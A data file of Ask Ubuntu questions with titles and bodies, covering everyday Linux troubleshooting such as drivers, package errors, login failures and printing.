432707	broadcom 4313 doesnt work with brcmsmac drivers	my problem is that i need work with brcmsmac drivers on broadcom 4313 . and my wifi works only when i am 1 or 2 metres from router when i am using brcmsmac . when i switch to wl drivers , everything works , but they dont support monitor mode and i need it because of aircrack-ng . i am on ubuntu 13.10 . what do you suggest ?
432714	nvidia drivers making unity not working fine	i just installed ubuntu 12.04 on my gigabyte p35k . unity was working fine at the first boot , but then i installed the nvidia driver and now when i move a window it is pretty slow , when i take the window to one border it does not resize , etc ... i know that it is not a problem from the unity configuration because i broke my last install trying to fix this problem ... is there a problem with the latest nvidia driver ? i installed it using sudo apt-get install nvidia-current . thank you in advance for your answers .
432716	13.10 support cycle	i am running 12.04 lts and want to upgrade to 13.10 . when does the 9 month support cycle end ? what happens to 13.10 when it ends ? does the update manager upgrade you to the next version / release when available and before the cycle ends for 13.10 ?
432717	grep keeps printing the same string	i typed grep ch- > spl [ 4 ] * into my shell to look for something in a mud code and its broken grep now . any time i try to grep anything pretty much it puts the spl [ 4 ] before the filename like this . [ : spl [ 4 ] : spl [ 4 ] : spl [ 4 ] : spl [ 4 ] : spl [ 4 ] : spl [ 4 ] : spl [ 4 ] : spl [ 4 ] : spl [ 4 ] : act_wiz.c : if ( vch- > timer > 0 ) question is how do i clear/stop this so i can get my normal grep back ?
432718	first steps in verifying random crashes ?	recently my system has been acting weird . i consider it stable and i leave my system pretty much running 24/7 . however , just about an hour ago i decided to get out of the pc for a bit and do my things , when i come back i noticed that the pc somehow rebooted to the login screen and some of the things i had running somehow got corrupted . things that got corrupted : kde configurations : lost my wallpaper settings and folder widgets i had set . i 'm glad it was only this since it 's pretty trivial . anyway , i want to become more ... efficient in analyzing and resolving these issues if i can . what are the recommended steps to verify these issues ? what i did at least today was read the syslog and kernel logs but nothing gave me any indication that there was anything wrong to cause a crash or force it to reboot .
432725	access folders with sudo priviliges via nautilius-connect to remote server	i need to access the /var/logs folder & many such folders on my remote server from nautilus , using `` connect to server '' via ssh . i avoid root logins & have disabled it . i would like to use sudo instead , just like i do it with ssh sessions in terminal . how can i have nautilus use sudo on the remote server to gain access ? ( root login is disabled on server ) if not nautilus itself , are there any alternates that may help accomplish this ?
432727	installation of dual-boot 13.10 on mbp freezes	i 've been trying to install ubuntu 13.10 on my macbook pro ( 15 '' , mid-2009 , i.e . with dual graphics chips ) via bootcamp . i can boot off the disk , select a language , and select `` install ubuntu '' . then a whole lot of text scrolls past quickly but at some point it stops and freezes ( attached picture shows the frozen screen ) . i have waited for ca . half an hour for any change , nothing happens . the dvd drive seems to stop reading as well . some more info : my macos version is 10.9.2 ( not sure this is relevant ) i am using the desktop-amd64+mac.iso burned to a dvd my internal dvd drive appears to be broken so i am using an external drive any help would be much appreciated .
432729	my app missing in myapps	what do i need to do to get my app linked to my account again ? i logged into ubuntu develuper/myapps and it says i have no apps . it is still in the software center .
432730	cpu is running significantly hotter after installing gfx driver and using ubuntu 3d	i have an hp 17 '' laptop with an ati graphics card . i 'm using ubuntu 12.04 lts . a while ago i noticed that ubuntu is running in 2d mode and i did n't like that so after some research i stumbled upon this http : //askubuntu.com/a/252040/74345 and followed the exact steps to fix things . everything went fine and i 'm using 3d mode now . however , after the restart i noticed my cpu is significantly hotter . before the changes i made the temp never passed 50 degrees and after the update it 's never getting below 70 degrees -_- . is this a known thing ? what 's happening exactly ? at least where do i start my investigation ? is it possible that it 's using the cpu for the animations insdead of the gpu ? thank you !
432732	fatal error : gl/glut.h : no such file or directory	i 've been learning c++ and i 'm attempting to write a program . i keep getting this error . i 've read through other similar problems that people were having , and nothing has worked for me .
432734	apt-get dkpg problemns	people , help me . =/ sudo apt-get install sublime-text lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto sublime-text já é a versão mais nova . o seguinte pacote foi instalado automaticamente e já não é necessário : linux-image-generic utilize 'apt-get autoremove ' para o remover . 0 pacotes atualizados , 0 pacotes novos instalados , 0 a serem removidos e 0 não atualizados . 3 pacotes não totalmente instalados ou removidos . depois desta operação , 0 b adicionais de espaço em disco serão usados . você quer continuar [ s/n ] ? s configurando samba-common ( 2:3.6.18-1ubuntu3.1 ) ... dpkg : erro ao processar samba-common ( -- configure ) : sub-processo script post-installation instalado retornou estado de saída de erro 10 dpkg : problemas com dependências impedem a configuração de samba-common-bin : samba-common-bin depende de samba-common ( > = 2:3.4.0~pre1-2 ) ; porém : pacote samba-common não está configurado ainda . dpkg : erro ao processar samba-common-bin ( -- configure ) : problemas de dependência - deixando desconfigurado configurando grub-pc ( 2.00-19ubuntu2.1 ) ... nenhum relatório apport escrito pois a mensagem de erro indica que é um erro de seguimento de um erro anterior . dpkg : erro ao processar grub-pc ( -- configure ) : sub-processo script post-installation instalado retornou estado de saída de erro 10 erros foram encontrados durante o processamento de : samba-common samba-common-bin grub-pc e : sub-process /usr/bin/dpkg returned an error code ( 1 )
432735	ddrescue does not log after the option is set	i 'm trying to use ddrescue with the log option , but it 's not working . so i have 2 hds : /dev/sda - working /dev/sdb - bad i 'm booting from a live usb disk ( ubuntu 12 . 04 . 4 lts ) so , i mount the good hd ( ntfs partition ) : sudo mount /dev/sda4 /media/backup /media/backup is working , i can write , save , etc . i did n't mount /dev/sdb , since it 's bad , also if i mount /dev/sdb , i can access it . then i try ddrescue : sudo ddrescue -f -g -n /dev/sdb3 /media/backup/rescue.img /media/backup/rescue.txt result : ddrescue : warning : options -c -d -d -e -e -m -n -p -r -r -s -t and -t ddrescue : are ignored in generate-logfile mode . ddrescue : ca n't open output file : no such file or directory if i try : sudo ddrescue -f -g -n /dev/sdb3 /media/backup/rescue.img rescue.txt result : ddrescue : warning : options -c -d -d -e -e -m -n -p -r -r -s -t and -t ddrescue : are ignored in generate-logfile mode . ddrescue : ca n't open output file : no such file or directory so it only works if i remove -g and the log file . what im doing wrong ? why its not working ?
432736	build apt-mirror for ubuntu12.04 & 13.10	i found the file `` source.list '' under ubuntu12.04 and ubuntu13.10 is the same . does that mean i can build only one apt-mirror server to service both of the two versions ?
432740	how to send/receive files via bluetooth using commands/terminal ?	i have install bluetooth dongle software and with the help of commands ( terminal ) , i want to send and receive files from smart-phone . & how to get paired using terminal ?
432743	how are packages classified in apt-mark showauto/showmanual ?	i compare the outputs of $ dpkg -- get-selections | grep -v deinstall | awk ' { print $ 1 } ' > dpkg.txt $ apt-mark showmanual > manual.txt $ apt-mark showauto > auto.txt i think that dpkg.txt will be all packages manual.txt will be `` primary '' packages auto.txt will be dependencies of packages in manual.txt i checked and dpkg.txt is the `` sum '' of auto.txt and manual.txt as i expect but i am seeing `` primary '' packages such as apport , locate , unzip , zip in auto.txt and lots of lib files ( dependencies ? ) in manual.txt . why is that ? i have looked at man apt-mark but that does not explain my question : showauto showauto is used to print a list of automatically installed packages with each package on a new line . all automatically installed packages will be listed if no package is given . if packages are given only those which are automatically installed will be shown . and showmanual showmanual can be used in the same way as showauto except that it will print a list of manually installed packages instead . i also point out that i have not marked packages using apt-mark auto or apt-mark manual . please note that i do n't have any problems with my system . this is only for my understanding .
432746	print from command line	how can i print the command line output directly to the printer . i am using ubuntu server 12.04 and i have to copy files into a shared directory and then download them from a desktop ubuntu distribution to print them . any help is appreciated
432752	will a kernel update overwrite my wireless driver from a newer kernel ?	i run ubuntu release 12.04 ( precise ) 64-bit kernel linux 3.2.0-59-generic but i installed the wireless driver from backports-3.13-rc2-1 . now all works well . my question is about the kernel update because if i install the proposed security update to linux 3.2.0-60-generic it overwrite the wireless driver i patched . is there a way to install the new kernel maintaining the wireless driver from backports-3.13-rc2-1 ? ? best regards
432755	a setting which disables a network connection after a specified period	is there any program or setting which can automatically disable a network connection after 5 minutes when it is enabled manually ? so that the user will have to enable the connection every 5 minutes manually , if they need it more than 5 minutes .
432757	unable to start my apache	after i downgraded my php5.5 to php5.3.10 , i no longer able to start my apache2 . here is what i get : sudo service apache2 start [ sudo ] password for fcasili : * starting web server apache2 apache2 : syntax error on line 210 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/mods-enabled/access_compat.load : no such file or directory action 'start ' failed . the apache error log may have more information . i already tried purging my apache2 and re-install it again . please help
432763	cant install unixodbc-gui-qt_2.3.0 on ubuntu 13.10 , complains `` can not find qt ! ''	i am on ubuntu 13.10 and i am attempting to install unixodbc gui , the instructions look straight forward . when i run ./configure i get an err `` configure : error : can not find qt ! '' . i have installed every qt library i can find but i can not get past configure any ideas would be great !
432764	why cups keeps putting printer to `` sleep '' ? no erros are shown and it stops printing	i use some old machines as print servers using ubuntu server 12.04.4 lts cups . some times we have this problem that the printer share is there the server receives the job but nothing happens . the printer is an argox 214plus label printer . i install it as generic printer and text only . i do n't understand why it stops printing . does anyone know how to solve it ? [ edit ] cups version 1.7rc1 [ edit ] i noticed that , for some sobrenatural reason , some machines have cups 1.5.3 others have 1.7rc1 . i ran apt-get update and apt-get dist-upgrade and they simply do n't change cups version
432765	unable to install ccmake	[ preface : i have seen similar questions , but that did not help me and so this new question . to explain in more detail , i followed the steps in how do i resolve unmet dependencies ? , without rectifying the problem ] i am trying to install ccmake . however , i get the following error : sudo apt-get install cmake-curses-gui reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cmake-curses-gui : depends : cmake ( = 2.8.7-0ubuntu4 ) e : unable to correct problems , you have held broken packages . i tried sudo apt-get -f install , but it did not help . i am unable to find broken packages either .
432766	how can i download and install refind bootloader ( 0.7.7.1 ) ?	i 've seen an answer on installing ubuntu on msi-gt60 laptop on this site . it suggests that i should install refind bootloader but i ca n't find it anywhere . how can i install this ?
432767	run bash script from php	i want to run a shell script within a php webpage to check some processes running on my system ( ubuntu 12.04 ) . googleing i 've found about shell_exec ( ) but i ca n't manage to run the script when loading php . this is the php code i use . $ output = shell_exec ( './dirlist.bash ' ) ; echo `` < pre > $ output < /pre > '' ; and the piece of html i get < pre > < /pre > also tried $ output = shell_exec ( 'sudo -u www-data ./dirlist.bash ' ) ; dirlist.bash does ls -l ( just for testing script and shell_exec ) i think it is not a permission problem . running directory grants write and execute privileges for all users ( i should be careful here ) . drwxrwxrwx 4 meteo meteo 4096 mar 11 15:20 rams user www-data has been added to sudoers file in case it was needed www-data all = ( meteo ) nopasswd : /home/meteo/www/rams/dirlist.bash thanks in advance
432779	install 64bit ubuntu in virtualbox	i installed virtualbox and downloaded ubuntu 64 bits . when i select linux under virtualbox , only ubuntu 32 bits is shown . am i doing something wrong that stops the 64bit option from appearing ? my machine has 4gb of ram .
432781	ubuntu installation on windows 7	can anyone provide me with link of ubuntu setup ( non .iso file ) so that i can install it side-by-side on windows without writing on cd or usb flash drive ?
432782	updates requires installation of untrusted packages	i tried updating using update manager and i got error saying requires installation of untrusted package . i tried typing get update and get upgrade command in terminal but no avail . but following shows the result after `` get update '' in terminal . w : gpg error : http : // archive.canonical.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : // archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : // dell.archive.canonical.com precise-dell release : the following signatures were invalid : badsig f9fda6bed73cdc22 canonical archive automatic signing key < ftpmaster @ canonical.com > here is screen shot for your reference i am a very new user to ubuntu . please help and explain as if you are explaining a child .
432787	ca n't login to ubuntu gnome 13.10 . login screen does n't appear	i had been using ubuntu gnome for over 3 months now , without any issues . today , when i tried to boot the os , i could n't see the login screen . instead , it shows the screen with gnome logo and it is n't going to the login screen . i checked whether my disk is full , because i had a similiar experience before because my disk was full , but there is 53 % free space . i tried a few commands i saw from online forums by going to the textual login screen , like `` sudo dpkg-reconfigure gdm '' , and i even booted the os in recovery mode and run clean and fix package errors , but in vain . i tried installing lightdm and i was able to access the login screen . but when i login , i am getting dark background , and very different and pretty basic and minimal gui . when i tried to login with gnome , i got a gui without any menu bar and none of the keys are working . i am in the middle of my academic project and this issue is making me nuts , someone please help me solve the issue . output for /var/log/lightdm/lightdm.log is [ +0.02s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.02s ] debug : starting light display manager 1.8.4 , uid=0 pid=1021 [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/10-ubuntu.conf [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/20-gnome.conf [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-greeter-wrapper.conf [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-guest-wrapper.conf [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-unity-greeter.conf [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-xserver-command.conf [ +0.02s ] debug : loading configuration from /etc/lightdm/lightdm.conf [ +0.02s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.02s ] debug : registered seat module xlocal [ +0.02s ] debug : registered seat module xremote [ +0.02s ] debug : registered seat module unity [ +0.02s ] debug : registered seat module surfaceflinger [ +0.02s ] debug : adding default seat [ +0.02s ] debug : seat : starting [ +0.02s ] debug : seat : creating greeter session [ +0.20s ] debug : seat : setting xdg_seat=seat0 [ +0.20s ] debug : seat : creating display server of type x [ +0.20s ] debug : seat : starting local x display [ +0.20s ] debug : deactivating plymouth [ +0.22s ] debug : using vt 7 [ +0.22s ] debug : displayserver x-0 : logging to /var/log/lightdm/x-0.log [ +0.22s ] debug : displayserver x-0 : writing x server authority to /var/run/lightdm/root/:0 [ +0.22s ] debug : displayserver x-0 : launching x server [ +0.22s ] debug : launching process 1094 : /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +0.22s ] debug : displayserver x-0 : waiting for ready signal from x server :0 [ +0.22s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.22s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +1.79s ] debug : got signal 10 from process 1094 [ +1.79s ] debug : displayserver x-0 : got signal from x server :0 [ +1.79s ] debug : displayserver x-0 : connecting to xserver :0 [ +1.79s ] debug : quitting plymouth ; retaining splash [ +1.88s ] debug : seat : display server ready , starting session authentication [ +1.88s ] debug : session : setting xdg_vtnr=7 [ +1.88s ] debug : session pid=1224 : started with service 'lightdm-greeter ' , username 'lightdm' [ +2.53s ] debug : session pid=1224 : authentication complete with return value 0 : success [ +2.53s ] debug : seat : session authenticated , running command [ +2.53s ] debug : session pid=1224 : setting xdg_vtnr=7 [ +2.53s ] debug : session pid=1224 : running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +2.55s ] debug : session pid=1224 : logging to /var/log/lightdm/x-0-greeter.log [ +2.64s ] debug : activating vt 7 [ +4.08s ] debug : session pid=1224 : greeter connected version=1.8.4 [ +5.61s ] debug : session pid=1224 : greeter start authentication for bnidhin [ +5.61s ] debug : seat : setting xdg_seat=seat0 [ +5.61s ] debug : session : setting xdg_vtnr=7 [ +5.61s ] debug : session pid=1616 : started with service 'lightdm ' , username 'bnidhin' [ +5.68s ] debug : session pid=1224 : greeter start authentication for bnidhin [ +5.68s ] debug : session pid=1616 : sending sigterm [ +5.68s ] debug : seat : setting xdg_seat=seat0 [ +5.68s ] debug : session : setting xdg_vtnr=7 [ +5.68s ] debug : session pid=1620 : started with service 'lightdm ' , username 'bnidhin' [ +5.68s ] debug : session pid=1616 : terminated with signal 15 [ +5.68s ] debug : session : failed during authentication [ +5.68s ] debug : seat : session stopped [ +5.75s ] debug : session pid=1620 : got 1 message ( s ) from pam [ +5.75s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +10.84s ] debug : session pid=1224 : greeter start authentication for lightdm [ +10.84s ] debug : session pid=1620 : sending sigterm [ +10.84s ] debug : seat : setting xdg_seat=seat0 [ +10.84s ] debug : session : setting xdg_vtnr=7 [ +10.84s ] debug : session pid=1937 : started with service 'lightdm ' , username 'lightdm' [ +10.84s ] debug : session pid=1620 : terminated with signal 15 [ +10.84s ] debug : session : failed during authentication [ +10.84s ] debug : seat : session stopped [ +10.84s ] debug : session pid=1937 : got 1 message ( s ) from pam [ +10.84s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +12.15s ] debug : session pid=1224 : continue authentication [ +13.92s ] debug : session pid=1937 : authentication complete with return value 7 : authentication failure [ +13.92s ] debug : session pid=1224 : authenticate result for user lightdm : authentication failure [ +13.93s ] debug : session pid=1937 : exited with return value 1 [ +13.93s ] debug : seat : session stopped [ +13.93s ] debug : session pid=1224 : greeter start authentication for lightdm [ +13.93s ] debug : seat : setting xdg_seat=seat0 [ +13.93s ] debug : session : setting xdg_vtnr=7 [ +13.93s ] debug : session pid=1948 : started with service 'lightdm ' , username 'lightdm' [ +13.93s ] debug : session pid=1948 : got 1 message ( s ) from pam [ +13.93s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +18.74s ] debug : session pid=1224 : continue authentication [ +20.93s ] debug : session pid=1948 : authentication complete with return value 7 : authentication failure [ +20.93s ] debug : session pid=1224 : authenticate result for user lightdm : authentication failure [ +20.93s ] debug : session pid=1948 : exited with return value 1 [ +20.93s ] debug : seat : session stopped [ +20.93s ] debug : session pid=1224 : greeter start authentication for lightdm [ +20.93s ] debug : seat : setting xdg_seat=seat0 [ +20.93s ] debug : session : setting xdg_vtnr=7 [ +20.93s ] debug : session pid=2038 : started with service 'lightdm ' , username 'lightdm' [ +20.94s ] debug : session pid=2038 : got 1 message ( s ) from pam [ +20.94s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +27.30s ] debug : session pid=1224 : cancel authentication [ +27.31s ] debug : session pid=2038 : sending sigterm [ +27.31s ] debug : session pid=2038 : terminated with signal 15 [ +27.31s ] debug : session : failed during authentication [ +27.31s ] debug : seat : session stopped [ +134.52s ] debug : session pid=1224 : greeter start authentication for bnidhin [ +134.52s ] debug : seat : setting xdg_seat=seat0 [ +134.52s ] debug : session : setting xdg_vtnr=7 [ +134.52s ] debug : session pid=2058 : started with service 'lightdm ' , username 'bnidhin' [ +134.53s ] debug : session pid=2058 : got 1 message ( s ) from pam [ +134.53s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +135.63s ] debug : session pid=1224 : greeter start authentication for others [ +135.63s ] debug : session pid=2058 : sending sigterm [ +135.63s ] debug : seat : setting xdg_seat=seat0 [ +135.63s ] debug : session : setting xdg_vtnr=7 [ +135.64s ] debug : session pid=2059 : started with service 'lightdm ' , username 'others' [ +135.64s ] debug : session pid=2058 : terminated with signal 15 [ +135.64s ] debug : session : failed during authentication [ +135.64s ] debug : seat : session stopped [ +135.65s ] debug : session pid=2059 : got 1 message ( s ) from pam [ +135.65s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +135.84s ] debug : session pid=1224 : greeter start authentication for guest account [ +135.84s ] debug : session pid=2059 : sending sigterm [ +135.84s ] debug : session pid=2059 : terminated with signal 15 [ +135.84s ] debug : session : failed during authentication [ +135.84s ] debug : seat : session stopped [ +137.25s ] debug : session pid=1224 : greeter start authentication for others [ +137.25s ] debug : seat : setting xdg_seat=seat0 [ +137.25s ] debug : session : setting xdg_vtnr=7 [ +137.25s ] debug : session pid=2060 : started with service 'lightdm ' , username 'others' [ +137.26s ] debug : session pid=2060 : got 1 message ( s ) from pam [ +137.26s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +137.45s ] debug : session pid=1224 : greeter start authentication for bnidhin [ +137.45s ] debug : session pid=2060 : sending sigterm [ +137.45s ] debug : seat : setting xdg_seat=seat0 [ +137.45s ] debug : session : setting xdg_vtnr=7 [ +137.45s ] debug : session pid=2061 : started with service 'lightdm ' , username 'bnidhin' [ +137.45s ] debug : session pid=2060 : terminated with signal 15 [ +137.45s ] debug : session : failed during authentication [ +137.45s ] debug : seat : session stopped [ +137.46s ] debug : session pid=2061 : got 1 message ( s ) from pam [ +137.46s ] debug : session pid=1224 : prompt greeter with 1 message ( s ) [ +139.77s ] debug : session pid=1224 : continue authentication [ +139.84s ] debug : session pid=2061 : authentication complete with return value 0 : success [ +139.84s ] debug : session pid=1224 : authenticate result for user bnidhin : success [ +139.87s ] debug : session pid=1224 : user bnidhin authorized [ +139.88s ] debug : session pid=1224 : greeter requests session ubuntu [ +139.96s ] debug : writing /home/bnidhin/.dmrc [ +140.07s ] debug : seat : stopping greeter ; display server will be re-used for user session [ +140.07s ] debug : session pid=1224 : sending sigterm [ +140.10s ] debug : session pid=1224 : greeter closed communication channel [ +140.10s ] debug : session pid=1224 : exited with return value 0 [ +140.10s ] debug : seat : session stopped [ +140.10s ] debug : seat : greeter stopped , running session [ +140.10s ] debug : registering session with bus path /org/freedesktop/displaymanager/session0 [ +140.10s ] debug : session pid=2061 : setting xdg_vtnr=7 [ +140.10s ] debug : session pid=2061 : running command /usr/sbin/lightdm-session gnome-session -- session=ubuntu [ +140.10s ] debug : session pid=2061 : logging to .xsession-errors [ +140.11s ] debug : activating vt 7
432790	can not start oracle database 11g xe on ubuntu 64bit	i can not start oracle on ubuntu 13.10 64bit . after trying to configure : sudo / etc / init.d / oracle-xe configure this error appears : oracle database 11g express edition is not configured . you must run '/etc/init.d/oracle-xe configure ' as the root user to configure the database '' i have logged in as root and then run the script successfully configured .
432792	analyze firewall logs to track intrusion	i have just started this topic where the firewall on my router detects intrusions e.g . mar 11 14:15:11 kernel warning kernel : [ fwlog ] intrusion - > src=85.102.133.241 dst=109.78.126.234 i 'm looking for advice on how i can investigate this further . firestarter and gufw is installed .
432795	how to copy a file to multiple folders using the command line ?	i have tried to copy a file test.txt to multiple directories with one command : cp ~/test.txt ~/folder1 ~/folder2 but i did n't succeed . is there a way to do that in one command so i can copy a file or even a folder to multiple directories ?
432801	how to mount with udisks to specified directory	i have ubuntu 12.04 and i need a portable solution ( to work on various linux systems ) and to be in my user 's home directory for mounting a partition after login or after boot . from what i searched on web i saw that using udisks is the best solution but what i did not find is how to mount the auxiliary partition to a specified mount point ( directory path ) what i have so far is ( by device name ) : /usr/bin/udisks -- mount /dev/sdbx or ( by uuid ) : /usr/bin/udisks -- mount /dev/disk/by-uuid/1313-f422 but there is no example on how to specify the mount point . for me , it is mandatory to have a specific directory target ( /media/aux/ for example ) . is there a way to do this ( not necessarily using udisks ) ?
432809	why is kswapd0 running on a computer with no swap ?	i have a cloud server with ~14g of ram and no swap . however , i occasionally see kswapd0 taking up some cpu when i run top . why would kswapd0 be running at all if there 's no swap space for it to manage ?
432810	2operating systems on same desktop ?	`` after your computer restarts , choose 'ubuntu ' from the boot menu . '' is it possible to choose between ubuntu and windows each time the desktop is started up ?
432812	installed libgdx and opengl in ubuntu	first let me say thanks for all the help in my other questions ; the answers have really help a lot . now i 'm in the process in developing game for tablet , pc and android platform . i have decided to use libgdx and opengl for my games in the future since i 'm focusing in java ; the big question is how do i installed it in ubuntu ? thanks in advance p.s if i have to use eclipse in the process or terminal i 'm game : )
432815	how do i get usb modem k3772-z working on kubuntu 12.04	i viewed and earlier thread for the same modem but for ubuntu 12.04 i am using a dual boot running xp sp2 with kubuntu 12.04 could any one please point me into the right direction ? could i use the same way of fixing this or do have to use another way ?
432823	moving tab title position from top to bottom in ubuntu terminal	i had to recently moved to ubuntu 12.04 from 10.04 . i am used to see terminal titles in the bottom and prefer the same . is there some way that i can change the tab title from top to bottom ?
432826	flash suddenly stopped working in seamonkey / ubuntu 13.10	somehow flash just stopped working in seamonkey . it has version 11.2.202.291 which is relatively recent , and was working until a few days ago ( i do not know exactly when it stopped working . ) firefox gets its version from /usr/lib/flashplugin-installer/libflashplayer.so and that one works just fine . however , if i try to use that version with seamonkey , it does n't even get detected ... also , i clicked on the link find updates for installed plugins at mozilla.com/plugincheck and the plugin is shown as current / valid . any idea what would be happening ?
432829	mac os x theme for ubuntu 13.10	i installed mac osx theme for ubuntu 13.10 ( i am a new ubuntu user ) , and i am wondering how i can remove ( not hide ) the left menu bar , and move all programs to the bottom menu bar ( max osx theme ) .
432832	when repairing package catalog : failed to remove essential system package	i recently made the mistake of trying to install a newer version of libattr1 from trusty on my precise installation so i could use trusty 's newer cmake ( bad idea , i know ) . halfway through the installation , it failed with an error . now , the software center wants me to repair the package catalog . when i try , however , i get this : apt-get gives a slightly more descriptive error when i try to install something : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libattr1 : breaks : libattr1 : i386 ( ! = 1:2.4.46-8ubuntu2 ) but 1:2.4.46-5ubuntu1 is installed libattr1 : i386 : breaks : libattr1 ( ! = 1:2.4.46-5ubuntu1 ) but 1:2.4.46-8ubuntu2 is installed e : unmet dependencies . try using -f. seems to be a circular dependency issue or something . when i run sudo apt-get install -f , this appears : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : bluez-alsa : i386 libsdl-ttf2.0-0 : i386 libgconf-2-4 : i386 libstdc++5 : i386 libgail18 : i386 libqt4-qt3support : i386 libcupsimage2 : i386 libnss3 : i386 gtk2-engines : i386 libgudev-1.0-0 : i386 libcairo-gobject2 : i386 libavc1394-0 : i386 libaio1 : i386 odbcinst1debian2 : i386 libqt4-test : i386 libqt4-designer : i386 libsdl-mixer1.2 : i386 libcap2 : i386 libproxy1 : i386 ibus-gtk : i386 libdbus-glib-1-2 : i386 libtdb1 : i386 libspeex1 : i386 libibus-1.0-0 : i386 libcanberra-gtk-module : i386 libcanberra0 : i386 gtk2-engines-murrine : i386 libwavpack1 : i386 libqt4-opengl : i386 libsoup-gnome2.4-1 : i386 gstreamer0.10-plugins-good : i386 libiec61883-0 : i386 libsdl-image1.2 : i386 libxaw7 : i386 libgdbm3 : i386 libesd0 : i386 libmikmod2 : i386 libpulse-mainloop-glib0 : i386 libaa1 : i386 libao4 : i386 pax libxmu6 : i386 libcanberra-gtk0 : i386 libvorbisfile3 : i386 libqt4-svg : i386 libgail-common : i386 libraw1394-11 : i386 libnspr4 : i386 libshout3 : i386 libdv4 : i386 rpm librpmbuild2 gstreamer0.10-x : i386 libsdl-net1.2 : i386 libgnome-keyring0 : i386 libxtst6 : i386 gtk2-engines-pixbuf : i386 libtag1c2a : i386 libssl0.9.8 : i386 libmad0 : i386 gtk2-engines-oxygen : i386 lib32z1 xaw3dg : i386 librpmsign0 libpulsedsp : i386 libodbc1 : i386 libqt4-scripttools : i386 lsb-core libxp6 : i386 alien libxmlrpc-core-c3 ncurses-term icc-profiles-free glib-networking : i386 libsoup2.4-1 : i386 libtag1-vanilla : i386 libaudiofile1 : i386 use 'apt-get autoremove ' to remove them . the following packages will be removed : google-earth-stable ia32-libs ia32-libs-multiarch : i386 libacl1 : i386 libattr1 : i386 softmaker-freeoffice 0 upgraded , 0 newly installed , 6 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 484 mb disk space will be freed . do you want to continue [ y/n ] ? the thought of removing all those packages that seem critical freaks me out . what should i do ? i do n't even dare restart my computer now .
432834	how to serve .deb files compiled for amd64 without receiving errors that i386 .deb files are not available ?	i have a repository on a ubuntu 12.04 server that is serving .deb files for only 64 bit architectures . when i run apt-get update i get the following w : failed to fetch https : //test.com/repo/dists/precise/release unable to find expected entry 'main/binary-i386/packages ' in release file ( wrong sources.list entry or malformed file ) i 'm using reprepro to add the .deb files to the repository reprepro -vb . includedeb precise package_amd64.deb and in my distributions file /var/www/site/repo/conf/distributions i am only specifying amd64 bit architectures . origin : apt.site.com label : apt repository codename : precise architectures : amd64 source components : main description : debian package repo signwith : yes pull : precise i circumvent the error by having my sources.list file include an entry that includes [ arch=amd64 ] deb [ arch=amd64 ] https : //apt.site.com/repo precise main however i would like to avoid having to specify that in my sources.list file . is there anything i can configure on the repository to tell clients trying to pull files from the repo that they should only expect .deb files compiled for amd64 architectures ?
432836	how can i check disk space used in a partition using the terminal in ubuntu 12.04 lts ?	i am using ubuntu 12.04 lts and i was wondering if there is a command that can tell the space used in a partition using the terminal . like i want to use the su command to change to a user called admin ( it is named admin ) . so i typed : su admin entered the password now i want to see the disk space used in this partition . so ... . is there is a command fot that ?
432838	mouse and keyboard not working after 10 minutes	my laptop for a whole week has gone crazy , what i mean ? well ... when i open it , all works good , the mouse and the keyboard , but , after 10 minutes , all stops working , and i ca n't move the mouse or write anything . does anybody know what is the problem , please ... ? thank you !
432841	usb tethering not working	i have established usb tethering ( using samsung gt-s5303 ) 2days earlier . it worked fine until i restarted by laptop yesterday with the tethering enabled . since then , my tethering is not working . i have tried to establish portable wi-fi hotspot and it also failed . at the worse , now i have found that even my broadband is not connecting also . whereas all the mentioned connections are working well on my pc . please tell me a way to get back my connections . i am using ubuntu 12.04lts . btw , i have not updated any software except firefox in between the scenario .
